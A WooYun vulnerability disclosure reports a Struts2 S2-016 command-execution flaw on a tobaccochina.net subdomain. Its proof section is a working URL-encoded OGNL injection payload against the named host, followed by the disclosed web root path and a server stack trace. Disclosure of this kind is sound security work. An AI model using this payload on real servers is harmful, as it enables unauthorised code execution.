当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032164

漏洞标题:烟草在线某分站struts2命令执行漏洞

相关厂商:烟草在线

漏洞作者: hlx98007

提交时间:2013-07-25 18:03

修复时间:2013-09-08 18:04

公开时间:2013-09-08 18:04

漏洞类型:命令执行

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-25: 积极联系厂商并且等待厂商认领中,细节不对外公开
2013-09-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

S2-016漏洞

详细说明:

struts2平台未升级漏洞

漏洞证明:

Http://ztb.tobaccochina.net/index.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29}
F:\wwwroot\zhaotoubiao\
<html>
<body>
<h1>500 Servlet Exception</h1>

<pre>
<script language='javascript' type='text/javascript'>
function show() { document.getElementById('trace').style.display = ''; }
</script>
<a style="text-decoration" href="javascript:show();">[show]</a> java.lang.IllegalStateException: sendError() forbidden after buffer has
been committed.
<span id="trace" style="display:none">
java.lang.IllegalStateException: sendError() forbidden after buffer has
been committed.
	at com.caucho.server.connection.AbstractHttpResponse.sendError(AbstractHttpResponse.java:544)
	at com.caucho.server.connection.HttpServletResponseImpl.sendError(HttpServletResponseImpl.java:266)
	at org.apache.struts2.dispatcher.Dispatcher.sendError(Dispatcher.java:771)
	at org.apache.struts2.dispatcher.Dispatcher.serviceAction(Dispatcher.java:506)
	at org.apache.struts2.dispatcher.ng.ExecuteOperations.executeAction(ExecuteOperations.java:77)
	at org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter.doFilter(StrutsPrepareAndExecuteFilter.java:91)
	at com.caucho.server.dispatch.FilterFilterChain.doFilter(FilterFilterChain.java:87)
	at org.springframework.orm.hibernate3.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:198)
	at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:76)
	at com.caucho.server.dispatch.FilterFilterChain.doFilter(FilterFilterChain.java:87)
	at com.caucho.server.webapp.WebAppFilterChain.doFilter(WebAppFilterChain.java:189)
	at com.caucho.server.dispatch.ServletInvocation.service(ServletInvocation.java:266)
	at com.caucho.server.hmux.HmuxRequest.handleRequest(HmuxRequest.java:463)
	at com.caucho.server.port.TcpConnection.handleRequests(TcpConnection.java:577)
	at com.caucho.server.port.TcpConnection$AcceptTask.doAccept(TcpConnection.java:1211)
	at com.caucho.server.port.TcpConnection$AcceptTask.run(TcpConnection.java:1152)
	at com.caucho.util.ThreadPool$Item.runTasks(ThreadPool.java:759)
	at com.caucho.util.ThreadPool$Item.run(ThreadPool.java:681)
	at java.lang.Thread.run(Thread.java:619)
</span>
</pre>


<p /><hr />
<small>
Resin/3.2.1
Server: ''
</small>
</body></html>

修复方案:

升级struts2版本到最新

版权声明:转载请注明来源 hlx98007@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝